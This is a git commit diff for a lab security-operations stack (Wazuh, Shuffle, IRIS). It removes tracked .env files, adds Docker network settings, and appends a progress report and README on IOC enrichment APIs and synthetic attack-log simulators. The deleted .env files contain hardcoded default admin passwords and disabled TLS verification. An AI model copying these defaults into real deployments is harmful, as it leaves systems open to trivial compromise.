tum недель назад: 3
Родитель
Сommit
0de071e7c9

+ 4 - 4
.gitignore

@@ -27,10 +27,10 @@ node_modules/
27 27
 **/node_modules/
28 28
 
29 29
 # Env/secrets
30
-# .env
31
-# .env.*
32
-# !.env.example
33
-# !**/.env.example
30
+.env
31
+.env.*
32
+!.env.example
33
+!**/.env.example
34 34
 # *.pem
35 35
 # *.key
36 36
 # *.crt

+ 0 - 122
Shuffle/.env

@@ -1,122 +0,0 @@
1
-# Default execution environment for workers
2
-ENVIRONMENT_NAME=Shuffle
3
-
4
-# Sanitize liquid.py input
5
-LIQUID_SANITIZE_INPUT=true
6
-
7
-
8
-# Remote github config for first load
9
-SHUFFLE_DOWNLOAD_WORKFLOW_LOCATION=
10
-SHUFFLE_DOWNLOAD_WORKFLOW_USERNAME=
11
-SHUFFLE_DOWNLOAD_WORKFLOW_PASSWORD=
12
-SHUFFLE_DOWNLOAD_WORKFLOW_BRANCH=
13
-
14
-SHUFFLE_APP_DOWNLOAD_LOCATION=https://github.com/shuffle/python-apps
15
-SHUFFLE_DOWNLOAD_AUTH_USERNAME=
16
-SHUFFLE_DOWNLOAD_AUTH_PASSWORD=
17
-SHUFFLE_DOWNLOAD_AUTH_BRANCH=
18
-SHUFFLE_APP_FORCE_UPDATE=false
19
-
20
-# User config for first load. Username & PW: min length 3
21
-SHUFFLE_DEFAULT_USERNAME=
22
-SHUFFLE_DEFAULT_PASSWORD=
23
-SHUFFLE_DEFAULT_APIKEY=
24
-
25
-# Local location of your app directory. Can't use ~/
26
-# Files will get better at some point. Right now: local saving.
27
-SHUFFLE_APP_HOTLOAD_FOLDER=./shuffle-apps
28
-SHUFFLE_APP_HOTLOAD_LOCATION=./shuffle-apps
29
-SHUFFLE_FILE_LOCATION=./shuffle-files
30
-
31
-# Encryption modifier. This HAS to be set to encrypt any authentication being used in Shuffle. This is put together with other relevant values to ensure multiple parts are needed to decrypt.
32
-# If this key is lost or changed, you will have to reauthenticate all apps.
33
-SHUFFLE_ENCRYPTION_MODIFIER=
34
-
35
-# Other configs
36
-BASE_URL=http://shuffle-backend:5001
37
-SSO_REDIRECT_URL=http://localhost:3001
38
-BACKEND_HOSTNAME=shuffle-backend
39
-BACKEND_PORT=5001
40
-FRONTEND_PORT=3001
41
-FRONTEND_PORT_HTTPS=3443
42
-AUTH_FOR_ORBORUS=
43
-
44
-# CHANGE THIS IF YOU WANT GOOD LOCAL EXECUTIONS:
45
-OUTER_HOSTNAME=shuffle-backend
46
-DB_LOCATION=./shuffle-database
47
-DOCKER_API_VERSION=1.44
48
-
49
-# Orborus/Proxy configurations
50
-HTTP_PROXY=
51
-HTTPS_PROXY=
52
-SHUFFLE_PASS_WORKER_PROXY=TRUE
53
-SHUFFLE_PASS_APP_PROXY=TRUE
54
-SHUFFLE_INTERNAL_HTTP_PROXY=noproxy
55
-SHUFFLE_INTERNAL_HTTPS_PROXY=noproxy
56
-# Timezone-handler in Orborus, Worker and Apps
57
-TZ=Europe/Amsterdam
58
-# Used to FIND the containername. cgroup v2: issue 501
59
-ORBORUS_CONTAINER_NAME=
60
-# Used for setting up a startup delay for Orborus
61
-SHUFFLE_ORBORUS_STARTUP_DELAY=
62
-SHUFFLE_SKIPSSL_VERIFY=true
63
-# Used for controlling if the environment should run in kubernetes or not
64
-IS_KUBERNETES=false
65
-
66
-#SHUFFLE_BASE_IMAGE_NAME=shuffle
67
-#SHUFFLE_BASE_IMAGE_REGISTRY=ghcr.io
68
-SHUFFLE_BASE_IMAGE_REPOSITORY=frikky
69
-#SHUFFLE_BASE_IMAGE_TAG_SUFFIX="-1.4.0"
70
-
71
-# For environments using their own docker registry
72
-# where they don't want to update http, subflow and shuffle tools again
73
-SHUFFLE_USE_GCHR_OVERRIDE_FOR_AUTODEPLOY=true
74
-
75
-# The eth0 interface inside a container corresponds
76
-# to the virtual Ethernet interface that connects
77
-# the container to the docker0
78
-SHUFFLE_SWARM_BRIDGE_DEFAULT_INTERFACE=eth0
79
-# 1500 by default
80
-SHUFFLE_SWARM_BRIDGE_DEFAULT_MTU=1500
81
-
82
-# Used for auto-cleanup of containers. REALLY important at scale. Set to false to see all container info.
83
-SHUFFLE_MEMCACHED=
84
-SHUFFLE_CONTAINER_AUTO_CLEANUP=true
85
-# The amount of concurrent executions Orborus can handle. This is a soft limit, but it's recommended to keep it low.
86
-SHUFFLE_ORBORUS_EXECUTION_CONCURRENCY=5
87
-SHUFFLE_HEALTHCHECK_DISABLED=false
88
-SHUFFLE_ELASTIC=true
89
-SHUFFLE_LOGS_DISABLED=true
90
-SHUFFLE_CHAT_DISABLED=false
91
-SHUFFLE_DISABLE_RERUN_AND_ABORT=false
92
-SHUFFLE_RERUN_SCHEDULE=300
93
-# Definition in case Worker & Orborus is talking to the wrong server
94
-SHUFFLE_WORKER_SERVER_URL=
95
-# Definition in case Orborus is pulling too often/not often enough
96
-SHUFFLE_ORBORUS_PULL_TIME=
97
-# Max recursion depth for subflows
98
-SHUFFLE_MAX_EXECUTION_DEPTH=
99
-# Amount of app replicas
100
-SHUFFLE_APP_REPLICAS=3
101
-
102
-# DATABASE CONFIGURATIONS
103
-DATASTORE_EMULATOR_HOST=shuffle-database:8000
104
-SHUFFLE_OPENSEARCH_URL=https://shuffle-opensearch:9200
105
-SHUFFLE_OPENSEARCH_CERTIFICATE_FILE=
106
-SHUFFLE_OPENSEARCH_APIKEY=
107
-SHUFFLE_OPENSEARCH_CLOUDID=
108
-SHUFFLE_OPENSEARCH_PROXY=
109
-SHUFFLE_OPENSEARCH_INDEX_PREFIX=
110
-SHUFFLE_OPENSEARCH_SKIPSSL_VERIFY=true
111
-SHUFFLE_OPENSEARCH_USERNAME="admin"
112
-SHUFFLE_OPENSEARCH_PASSWORD="StrongShufflePassword321!" # In use for the first time setup of OpenSearch + backend of Shuffle
113
-OPENSEARCH_INITIAL_ADMIN_PASSWORD="StrongShufflePassword321!" # In use for the first time setup of OpenSearch
114
-SHUFFLE_SKIP_PIPELINES=true
115
-SHUFFLE_PIPELINE_ENABLED=false
116
-
117
-#Tenzir related
118
-SHUFFLE_TENZIR_URL=
119
-
120
-SHUFFLE_PROTECTED_CLEANUP_DISABLED=true
121
-
122
-DEBUG_MODE=false

+ 8 - 0
compose-overrides/soc-integrator.yml

@@ -41,6 +41,8 @@ services:
41 41
         condition: service_healthy
42 42
     networks:
43 43
       - soc_shared
44
+      - shuffle_default
45
+      - shuffle_swarm_executions
44 46
 
45 47
 volumes:
46 48
   soc-integrator-db-data:
@@ -49,3 +51,9 @@ networks:
49 51
   soc_shared:
50 52
     external: true
51 53
     name: ${SOC_SHARED_NETWORK:-soc_shared}
54
+  shuffle_default:
55
+    external: true
56
+    name: shuffle_shuffle
57
+  shuffle_swarm_executions:
58
+    external: true
59
+    name: shuffle_swarm_executions

+ 0 - 103
iris-web/.env

@@ -1,103 +0,0 @@
1
-# -- COMMON
2
-LOG_LEVEL=info
3
-
4
-# -- NGINX
5
-NGINX_IMAGE_NAME=ghcr.io/dfir-iris/iriswebapp_nginx
6
-NGINX_IMAGE_TAG=latest
7
-
8
-SERVER_NAME=iris.app.dev
9
-KEY_FILENAME=iris_dev_key.pem
10
-CERT_FILENAME=iris_dev_cert.pem
11
-
12
-# -- DATABASE
13
-DB_IMAGE_NAME=ghcr.io/dfir-iris/iriswebapp_db
14
-DB_IMAGE_TAG=latest
15
-
16
-POSTGRES_USER=postgres
17
-POSTGRES_PASSWORD=__MUST_BE_CHANGED__
18
-POSTGRES_ADMIN_USER=raptor
19
-POSTGRES_ADMIN_PASSWORD=__MUST_BE_CHANGED__
20
-POSTGRES_DB=iris_db
21
-
22
-POSTGRES_SERVER=db
23
-POSTGRES_PORT=5432
24
-
25
-# -- IRIS
26
-APP_IMAGE_NAME=ghcr.io/dfir-iris/iriswebapp_app
27
-APP_IMAGE_TAG=latest
28
-
29
-DOCKERIZED=1
30
-
31
-IRIS_SECRET_KEY=AVerySuperSecretKey-SoNotThisOne
32
-IRIS_SECURITY_PASSWORD_SALT=ARandomSalt-NotThisOneEither
33
-IRIS_UPSTREAM_SERVER=app
34
-IRIS_UPSTREAM_PORT=8000
35
-
36
-IRIS_FRONTEND_SERVER=frontend
37
-IRIS_FRONTEND_PORT=5173
38
-
39
-IRIS_SVELTEKIT_FRONTEND_DIR=../iris-frontend
40
-
41
-
42
-# -- WORKER
43
-CELERY_BROKER=amqp://rabbitmq
44
-
45
-# -- AUTH
46
-IRIS_AUTHENTICATION_TYPE=local
47
-## optional
48
-IRIS_ADM_PASSWORD=MySuperAdminPassword!
49
-#IRIS_ADM_API_KEY=B8BA5D730210B50F41C06941582D7965D57319D5685440587F98DFDC45A01594
50
-#IRIS_ADM_EMAIL=admin@localhost
51
-IRIS_ADM_USERNAME=administrator
52
-# requests the just-in-time creation of users with ldap authentification (see https://github.com/dfir-iris/iris-web/issues/203)
53
-#IRIS_AUTHENTICATION_CREATE_USER_IF_NOT_EXIST=True
54
-# the group to which newly created users are initially added, default value is Analysts
55
-#IRIS_NEW_USERS_DEFAULT_GROUP=
56
-
57
-# -- FOR LDAP AUTHENTICATION
58
-#IRIS_AUTHENTICATION_TYPE=ldap
59
-#LDAP_SERVER=127.0.0.1
60
-#LDAP_AUTHENTICATION_TYPE=SIMPLE
61
-#LDAP_PORT=3890
62
-#LDAP_USER_PREFIX=uid=
63
-#LDAP_USER_SUFFIX=ou=people,dc=example,dc=com
64
-#LDAP_USE_SSL=False
65
-# base DN in which to search for users
66
-#LDAP_SEARCH_DN=ou=users,dc=example,dc=org
67
-# unique identifier to search the user
68
-#LDAP_ATTRIBUTE_IDENTIFIER=cn
69
-# name of the attribute to retrieve the user's display name
70
-#LDAP_ATTRIBUTE_DISPLAY_NAME=displayName
71
-# name of the attribute to retrieve the user's email address
72
-#LDAP_ATTRIBUTE_MAIL=mail
73
-#LDAP_VALIDATE_CERTIFICATE=True
74
-#LDAP_TLS_VERSION=1.2
75
-#LDAP_SERVER_CERTIFICATE=
76
-#LDAP_PRIVATE_KEY=
77
-#LDAP_PRIVATE_KEY_PASSWORD=
78
-
79
-# -- FOR OIDC AUTHENTICATION
80
-# IRIS_AUTHENTICATION_TYPE=oidc
81
-# OIDC_ISSUER_URL=
82
-# OIDC_CLIENT_ID=
83
-# OIDC_CLIENT_SECRET=
84
-# endpoints only required if provider doesn't support metadata discovery
85
-# OIDC_AUTH_ENDPOINT=
86
-# OIDC_TOKEN_ENDPOINT=
87
-# optional to include logout from oidc provider
88
-# OIDC_END_SESSION_ENDPOINT=
89
-# OIDC redirect URL for your IDP: https://<IRIS_SERVER_NAME>/oidc-authorize
90
-
91
-# -- LISTENING PORT
92
-INTERFACE_HTTPS_PORT=443
93
-
94
-# -- FOR OIDC AUTHENTICATION
95
-#IRIS_AUTHENTICATION_TYPE=oidc
96
-#OIDC_ISSUER_URL=
97
-#OIDC_CLIENT_ID=
98
-#OIDC_CLIENT_SECRET=
99
-# endpoints only required if provider doesn't support metadata discovery
100
-#OIDC_AUTH_ENDPOINT=
101
-#OIDC_TOKEN_ENDPOINT=
102
-# optional to include logout from oidc provider
103
-#OIDC_END_SESSION_ENDPOINT=

+ 298 - 0
progress-update.md

@@ -177,3 +177,301 @@ Target outputs:
177 177
 - Tuned policy thresholds for customer environment
178 178
 - Signed-off incident lifecycle flow:
179 179
   Wazuh event -> soc-integrator decision -> IRIS case -> PagerDuty Stub escalation
180
+
181
+---
182
+
183
+Date: February 26, 2026
184
+Project: FoodProject SOC Platform (Wazuh + Shuffle + IRIS-web + SOC Integrator)
185
+
186
+## Incremental Progress Since February 13, 2026
187
+
188
+### 1) IOC Enrichment and Evaluation
189
+
190
+- Added IOC APIs in `soc-integrator`:
191
+  - `POST /ioc/enrich`
192
+  - `POST /ioc/evaluate`
193
+  - `GET /ioc/history`
194
+  - `POST /ioc/upload-file`
195
+  - `POST /ioc/evaluate-file`
196
+  - `GET /ioc/analysis/{analysis_id}`
197
+- Integrated VirusTotal adapter for domain/hash/file intelligence and analysis lookups.
198
+- Integrated AbuseIPDB adapter for IP reputation checks.
199
+- Added IOC trace persistence (`ioc_trace`) and repository methods for audit/history.
200
+
201
+### 2) IRIS Integration Enhancements
202
+
203
+- Added IRIS ticket APIs in `soc-integrator`:
204
+  - `POST /iris/tickets`
205
+  - `GET /iris/tickets`
206
+- Updated IRIS API key in environment and verified ticket creation path via API.
207
+- Added demo data seeding script:
208
+  - `scripts/seed-iris-demo-data.sh`
209
+
210
+### 3) Shuffle Workflow Automation
211
+
212
+- Created and updated sample Shuffle workflow assets for webhook-driven IRIS ticket creation:
213
+  - `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.json`
214
+  - `shuffle-workflows/sample-webhook-soc-integrator-iris-workflow.md`
215
+- Added workflow update helper script:
216
+  - `scripts/update-shuffle-workflow-from-template.sh`
217
+- Updated target workflow (`07ecad05-ff68-41cb-888d-96d1a8e8db4b`) with:
218
+  - webhook trigger
219
+  - HTTP action (`http 1.4.0`) to call `soc-integrator` ticket API
220
+  - tested webhook execution path to successful completion
221
+
222
+### 4) Networking and Runtime Fixes
223
+
224
+- Resolved Shuffle action DNS failure to `soc-integrator` by attaching `soc-integrator` service to Shuffle execution network(s) in:
225
+  - `compose-overrides/soc-integrator.yml`
226
+- Verified connectivity from Shuffle execution context to:
227
+  - `http://soc-integrator:8080/health`
228
+
229
+### 5) Security and Repository Hygiene
230
+
231
+- Added `.env` and `.env.*` to root `.gitignore` (kept `.env.example` tracked).
232
+- Removed tracked env files from git cache to prevent secret leakage.
233
+- Updated operational API keys in `soc-integrator/.env` for Shuffle, IRIS, VirusTotal, and AbuseIPDB.
234
+
235
+### 6) Current Status (Lab)
236
+
237
+- `soc-integrator` health endpoint: reachable.
238
+- IOC enrich/evaluate flows: operational for domain/hash and file submission paths.
239
+- Shuffle webhook-to-IRIS automation: operational after network fix.
240
+- Core stack components remain available for continued UAT and tuning.
241
+
242
+### 7) Simulation Logs Workstream
243
+
244
+#### Completed
245
+
246
+- Added FortiGate simulation coverage for multiple models:
247
+  - 40F
248
+  - 60F
249
+  - 80F
250
+  - 501E
251
+- Added endpoint agent simulation coverage for:
252
+  - Windows clients
253
+  - macOS clients
254
+  - Linux clients
255
+- Added continuous run mode (`--forever`) to simulation scripts for long-running lab traffic generation.
256
+- Extended script set to support realistic event streams for Wazuh ingestion and rule validation.
257
+
258
+#### Operational scripts
259
+
260
+- `scripts/send-wazuh-test-events.sh`
261
+- `scripts/send-wazuh-endpoint-agent-test-events.sh`
262
+- additional simulation scripts under `scripts/` for firewall and endpoint scenarios with continuous mode enabled
263
+
264
+#### Detection alignment status
265
+
266
+- Simulation work has been aligned to the detection objectives documented in:
267
+  - `Security Detection & Threat Intelligence Enhancement Proposal-2.md`
268
+- Proposal use-case mapping explicitly covered in simulation:
269
+  - **A1. DNS / Firewall (IOC)**:
270
+    - DNS network communication to malicious domain
271
+    - DNS/Firewall malicious domain IOC detection events
272
+  - **A2. FortiGate IPS/IDS & Firewall**:
273
+    - allowed RDP from public IP
274
+    - admin password change
275
+    - create/add admin account
276
+    - disable email notification
277
+    - config download
278
+    - multiple critical/high IDS alerts
279
+    - port scanning (public/private source variants)
280
+    - IOC detection and communication to malicious IP
281
+  - **A3. FortiGate VPN**:
282
+    - authentication success from guest account
283
+    - authentication success from multiple countries
284
+    - brute-force success pattern
285
+    - multiple fail patterns (many accounts from one source)
286
+    - authentication success from outside Thailand
287
+  - **A4. Windows / Active Directory**:
288
+    - privileged/service account authentication failures
289
+    - password spray and multi-source fail patterns
290
+    - success from public IP / guest account
291
+    - pass-the-hash style success indicators
292
+    - account/group privilege change and account lifecycle events (create/re-enable)
293
+    - AD enumeration behavior indicators
294
+- Endpoint client simulations were added to complement proposal scope for heterogeneous environments:
295
+  - Windows agent events
296
+  - macOS agent events
297
+  - Linux agent events
298
+- Current use is suitable for pipeline and workflow validation (ingest -> detect -> automate -> case creation).
299
+- Remaining work is focused on fine-grained scenario calibration:
300
+  - event frequency tuning
301
+  - field/value realism per source
302
+  - expected alert volume by use case for cleaner UAT evidence
303
+
304
+### 8) API Request/Response Samples
305
+
306
+#### IOC Enrich
307
+
308
+Request:
309
+
310
+```bash
311
+curl -sS -X POST http://localhost:8088/ioc/enrich \
312
+  -H 'Content-Type: application/json' \
313
+  -d '{
314
+    "ioc_type": "domain",
315
+    "ioc_value": "google.com",
316
+    "sources": ["virustotal"]
317
+  }'
318
+```
319
+
320
+Sample response:
321
+
322
+```json
323
+{
324
+  "success": true,
325
+  "ioc_type": "domain",
326
+  "ioc_value": "google.com",
327
+  "enrichment": {
328
+    "virustotal": {
329
+      "reputation": 120,
330
+      "last_analysis_stats": {
331
+        "malicious": 0,
332
+        "suspicious": 0,
333
+        "harmless": 90
334
+      }
335
+    }
336
+  }
337
+}
338
+```
339
+
340
+#### IOC Evaluate
341
+
342
+Request:
343
+
344
+```bash
345
+curl -sS -X POST http://localhost:8088/ioc/evaluate \
346
+  -H 'Content-Type: application/json' \
347
+  -d '{
348
+    "ioc_type": "hash",
349
+    "ioc_value": "44d88612fea8a8f36de82e1278abb02f",
350
+    "sources": ["virustotal"]
351
+  }'
352
+```
353
+
354
+Sample response:
355
+
356
+```json
357
+{
358
+  "success": true,
359
+  "matched": true,
360
+  "severity": "high",
361
+  "reason": "VirusTotal marked IOC as malicious",
362
+  "ioc_type": "hash",
363
+  "ioc_value": "44d88612fea8a8f36de82e1278abb02f"
364
+}
365
+```
366
+
367
+#### Create IRIS Ticket (via soc-integrator)
368
+
369
+Request:
370
+
371
+```bash
372
+curl -sS -X POST http://localhost:8088/iris/tickets \
373
+  -H 'Content-Type: application/json' \
374
+  -d '{
375
+    "title": "Suspicious domain detected",
376
+    "description": "Automated ticket from IOC evaluation pipeline",
377
+    "severity": "medium",
378
+    "source_ref": "shuffle-webhook-demo"
379
+  }'
380
+```
381
+
382
+Sample response:
383
+
384
+```json
385
+{
386
+  "success": true,
387
+  "ticket_id": 53,
388
+  "case_id": 53,
389
+  "status": "open"
390
+}
391
+```
392
+
393
+### 9) Why IOC Was Added to SOC Integrator
394
+
395
+- To centralize threat-intelligence logic in one API layer instead of duplicating enrichment/evaluation rules across Shuffle workflows and other services.
396
+- To provide a consistent decision contract (`enrich` for context, `evaluate` for action/verdict) that downstream automation can trust.
397
+- To improve traceability by storing IOC checks and decisions in `soc-integrator` history for audit, tuning, and UAT evidence.
398
+- To simplify integrations with multiple intelligence providers (VirusTotal, AbuseIPDB, and future sources) behind one internal interface.
399
+- To reduce workflow complexity in Shuffle so playbooks focus on orchestration (branching, ticketing, notifications) while IOC decisioning stays in backend logic.
400
+
401
+### 10) Sequence Diagram (MermaidJS)
402
+
403
+```mermaid
404
+sequenceDiagram
405
+    autonumber
406
+    participant Sim as Log Simulator
407
+    participant Wz as Wazuh
408
+    participant Sh as Shuffle
409
+    participant SI as soc-integrator
410
+    participant VT as VirusTotal/AbuseIPDB
411
+    participant IR as IRIS
412
+
413
+    Sim->>Wz: Send FortiGate/Endpoint simulated logs
414
+    Wz->>Wz: Parse + correlate + trigger alert rule
415
+    Wz->>Sh: Trigger workflow (webhook/API)
416
+    Sh->>SI: POST /ioc/enrich (ioc_type, ioc_value)
417
+    SI->>VT: Query IOC intelligence
418
+    VT-->>SI: Enrichment data
419
+    SI-->>Sh: Enrichment result
420
+    Sh->>SI: POST /ioc/evaluate (ioc + enrichment context)
421
+    SI->>SI: Apply decision logic + write ioc_trace
422
+    SI-->>Sh: matched/severity/reason
423
+    alt matched == true
424
+        Sh->>SI: POST /iris/tickets
425
+        SI->>IR: Create ticket/case
426
+        IR-->>SI: ticket_id/case_id
427
+        SI-->>Sh: Ticket creation success
428
+    else matched == false
429
+        Sh-->>Sh: End workflow without ticket
430
+    end
431
+```
432
+
433
+### 11) SOC Integrator API Inventory
434
+
435
+| Group | Method | Endpoint | Notes |
436
+|---|---|---|---|
437
+| Core | GET | `/health` | Service health and target configuration |
438
+| Core | POST | `/ingest/wazuh-alert` | Normalize inbound Wazuh alert payload |
439
+| Core | POST | `/action/create-incident` | Create PagerDuty incident |
440
+| Core | POST | `/action/trigger-shuffle` | Trigger Shuffle workflow execution |
441
+| Core | POST | `/action/create-iris-case` | Create IRIS case (legacy action endpoint) |
442
+| IRIS | POST | `/iris/tickets` | Create IRIS ticket/case via soc-integrator |
443
+| IRIS | GET | `/iris/tickets` | List/query IRIS tickets/cases |
444
+| IOC | POST | `/ioc/enrich` | IOC enrichment from configured intel sources |
445
+| IOC | POST | `/ioc/evaluate` | IOC decisioning/verdict |
446
+| IOC | POST | `/ioc/upload-file` | Upload file to IOC backend (VirusTotal flow) |
447
+| IOC | GET | `/ioc/analysis/{analysis_id}` | Retrieve IOC analysis status/result |
448
+| IOC | POST | `/ioc/evaluate-file` | Evaluate file indicator or uploaded sample |
449
+| IOC | GET | `/ioc/history` | Retrieve stored IOC trace history |
450
+| Shuffle | GET | `/shuffle/health` | Shuffle service reachability check |
451
+| Shuffle | GET | `/shuffle/auth-test` | Validate Shuffle API key access |
452
+| Shuffle | POST | `/shuffle/login` | Login against Shuffle API |
453
+| Shuffle | POST | `/shuffle/generate-apikey` | Generate Shuffle API key from credentials |
454
+| Shuffle | GET | `/shuffle/workflows` | List workflows |
455
+| Shuffle | GET | `/shuffle/workflows/{workflow_id}` | Get workflow detail |
456
+| Shuffle | POST | `/shuffle/workflows/{workflow_id}/execute` | Execute specific workflow |
457
+| Shuffle | GET | `/shuffle/apps` | List installed/available Shuffle apps |
458
+| Shuffle | POST | `/shuffle/proxy` | Generic proxy request to Shuffle API |
459
+| Wazuh | GET | `/sync/wazuh-version` | Fetch Wazuh version information |
460
+| Wazuh | GET | `/wazuh/auth-test` | Validate Wazuh API authentication |
461
+| Wazuh | GET | `/wazuh/manager-info` | Manager information |
462
+| Wazuh | GET | `/wazuh/agents` | List Wazuh agents |
463
+| Wazuh | GET | `/wazuh/alerts` | Query recent Wazuh alerts |
464
+| Wazuh | GET | `/wazuh/manager-logs` | Read manager logs |
465
+| Wazuh | POST | `/wazuh/sync-to-mvp` | Sync Wazuh alerts into MVP pipeline |
466
+| Wazuh | GET | `/wazuh/auto-sync/status` | Auto-sync loop status |
467
+| MVP | POST | `/mvp/incidents/ingest` | Ingest incident into MVP flow |
468
+| MVP | POST | `/mvp/ioc/evaluate` | Evaluate IOC under MVP policy |
469
+| MVP | POST | `/mvp/vpn/evaluate` | Evaluate VPN event under MVP policy |
470
+| MVP | GET | `/mvp/config/policies` | Read MVP policy configuration |
471
+| MVP | PUT | `/mvp/config/policies` | Update MVP policy configuration |
472
+| MVP | GET | `/mvp/health/dependencies` | Dependency health snapshot |
473
+
474
+Additional FastAPI-generated endpoints:
475
+
476
+- `GET /docs`
477
+- `GET /openapi.json`

BIN
progress-update.pdf


+ 156 - 0
scripts/README.md

@@ -8,6 +8,9 @@ Use this to inject synthetic SOC events via syslog UDP into Wazuh manager.
8 8
 scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds]
9 9
 ```
10 10
 
11
+Optional flag:
12
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
13
+
11 14
 Scenarios:
12 15
 - `ioc_dns`
13 16
 - `ioc_ips`
@@ -21,6 +24,7 @@ Examples:
21 24
 scripts/send-wazuh-test-events.sh all
22 25
 scripts/send-wazuh-test-events.sh vpn_outside_th 5 0.2
23 26
 WAZUH_SYSLOG_HOST=127.0.0.1 WAZUH_SYSLOG_PORT=514 scripts/send-wazuh-test-events.sh ioc_ips
27
+scripts/send-wazuh-test-events.sh all 1 2 --forever
24 28
 ```
25 29
 
26 30
 Environment overrides:
@@ -42,6 +46,9 @@ Use this to inject Cisco-style syslog events (ASA/IOS) into Wazuh manager.
42 46
 scripts/send-wazuh-cisco-test-events.sh [scenario] [count] [delay_seconds]
43 47
 ```
44 48
 
49
+Optional flag:
50
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
51
+
45 52
 Scenarios:
46 53
 - `asa_acl_deny`
47 54
 - `asa_vpn_auth_fail`
@@ -55,6 +62,7 @@ Examples:
55 62
 scripts/send-wazuh-cisco-test-events.sh all
56 63
 scripts/send-wazuh-cisco-test-events.sh asa_acl_deny 5 0.2
57 64
 CISCO_DEVICE_HOST=edge-fw-01 scripts/send-wazuh-cisco-test-events.sh ios_login_fail
65
+scripts/send-wazuh-cisco-test-events.sh all 1 2 --forever
58 66
 ```
59 67
 
60 68
 Environment overrides:
@@ -66,6 +74,154 @@ Environment overrides:
66 74
 - `CISCO_VPN_USER`
67 75
 - `CISCO_ADMIN_USER`
68 76
 
77
+## Send FortiGate firewall test events
78
+
79
+Use this to inject FortiGate-style syslog events (models `501E`, `80F`, `60F`, `40F`) into Wazuh manager.
80
+
81
+```bash
82
+scripts/send-wazuh-fortigate-test-events.sh [model] [count] [delay_seconds]
83
+```
84
+
85
+Optional flag:
86
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
87
+
88
+Models:
89
+- `501E`
90
+- `80F`
91
+- `60F`
92
+- `40F`
93
+- `all`
94
+
95
+Examples:
96
+
97
+```bash
98
+scripts/send-wazuh-fortigate-test-events.sh all
99
+scripts/send-wazuh-fortigate-test-events.sh 80F 5 0.2
100
+WAZUH_SYSLOG_HOST=127.0.0.1 WAZUH_SYSLOG_PORT=514 scripts/send-wazuh-fortigate-test-events.sh 60F
101
+scripts/send-wazuh-fortigate-test-events.sh all 1 2 --forever
102
+```
103
+
104
+Environment overrides:
105
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
106
+- `WAZUH_SYSLOG_PORT` (default `514`)
107
+- `FGT_SRC_IP`
108
+- `FGT_DST_IP`
109
+- `FGT_DOMAIN`
110
+- `FGT_USER`
111
+
112
+## Run continuous FortiGate simulation
113
+
114
+Use this to generate ongoing FortiGate-like traffic and security events for Wazuh testing.
115
+
116
+```bash
117
+scripts/send-wazuh-fortigate-continuous.sh [profile] [models] [base_delay_seconds]
118
+```
119
+
120
+Profiles:
121
+- `normal` (mostly allowed traffic, occasional admin/vpn/webfilter)
122
+- `incident` (higher IPS/webfilter/vpn anomalies)
123
+- `mixed` (balanced baseline + anomalies)
124
+
125
+Models:
126
+- `501E`
127
+- `80F`
128
+- `60F`
129
+- `40F`
130
+- `all`
131
+
132
+Examples:
133
+
134
+```bash
135
+scripts/send-wazuh-fortigate-continuous.sh mixed all 0.8
136
+scripts/send-wazuh-fortigate-continuous.sh incident 80F 0.3
137
+SIM_MAX_EVENTS=200 scripts/send-wazuh-fortigate-continuous.sh normal 501E 1.0
138
+```
139
+
140
+Environment overrides:
141
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
142
+- `WAZUH_SYSLOG_PORT` (default `514`)
143
+- `SIM_MAX_EVENTS` (default `0`, which means run forever)
144
+- `SIM_SRC_PREFIX` (default `10.10.20`)
145
+- `SIM_VPN_USER`
146
+- `SIM_ADMIN_USER`
147
+
148
+## Simulate all required logs from proposal
149
+
150
+Use this to generate synthetic logs for all use cases listed in:
151
+`Security Detection & Threat Intelligence Enhancement Proposal-2.md` Appendix A (A1-A4).
152
+
153
+```bash
154
+scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds]
155
+```
156
+
157
+Optional flag:
158
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
159
+
160
+Selectors:
161
+- `all` (all Appendix A use cases)
162
+- `a1`, `a2`, `a3`, `a4` (by section)
163
+- specific use case id, e.g. `A2-01`, `A3-05`, `A4-24`
164
+
165
+Examples:
166
+
167
+```bash
168
+scripts/send-wazuh-proposal-required-events.sh all 1
169
+scripts/send-wazuh-proposal-required-events.sh a3 3 0.5
170
+scripts/send-wazuh-proposal-required-events.sh A3-05 1
171
+DRY_RUN=1 scripts/send-wazuh-proposal-required-events.sh all 1
172
+scripts/send-wazuh-proposal-required-events.sh a2 1 2 --forever
173
+```
174
+
175
+Environment overrides:
176
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
177
+- `WAZUH_SYSLOG_PORT` (default `514`)
178
+- `EVENT_DELAY` (default `0.05`)
179
+- `DRY_RUN` (default `0`, set `1` to print only)
180
+- `FGT_DEVNAME`, `FGT_DEVID`
181
+- `WIN_HOST`, `DNS_HOST`
182
+- `SIM_VPN_USER`
183
+
184
+## Simulate endpoint client-agent logs (Windows / macOS / Linux)
185
+
186
+Use this to inject realistic endpoint telemetry for client agents into Wazuh.
187
+
188
+```bash
189
+scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds]
190
+```
191
+
192
+Optional flag:
193
+- `--forever` (ignore `count` and run continuously until Ctrl+C)
194
+
195
+Platforms:
196
+- `windows`
197
+- `mac`
198
+- `linux`
199
+- `all`
200
+
201
+Scenarios:
202
+- `auth`
203
+- `process`
204
+- `persistence`
205
+- `privilege`
206
+- `malware`
207
+- `all`
208
+
209
+Examples:
210
+
211
+```bash
212
+scripts/send-wazuh-endpoint-agent-test-events.sh all all 1 0.2
213
+scripts/send-wazuh-endpoint-agent-test-events.sh windows process 10 0.1
214
+DRY_RUN=1 scripts/send-wazuh-endpoint-agent-test-events.sh linux all 1 0
215
+scripts/send-wazuh-endpoint-agent-test-events.sh all auth 1 2 --forever
216
+```
217
+
218
+Environment overrides:
219
+- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
220
+- `WAZUH_SYSLOG_PORT` (default `514`)
221
+- `DRY_RUN` (default `0`)
222
+- `WIN_HOST`, `MAC_HOST`, `LINUX_HOST`
223
+- `SIM_USER`
224
+
69 225
 ## Shuffle sample workflow helpers
70 226
 
71 227
 Sample playbook design for Shuffle:

+ 138 - 0
scripts/seed-iris-demo-data.sh

@@ -0,0 +1,138 @@
1
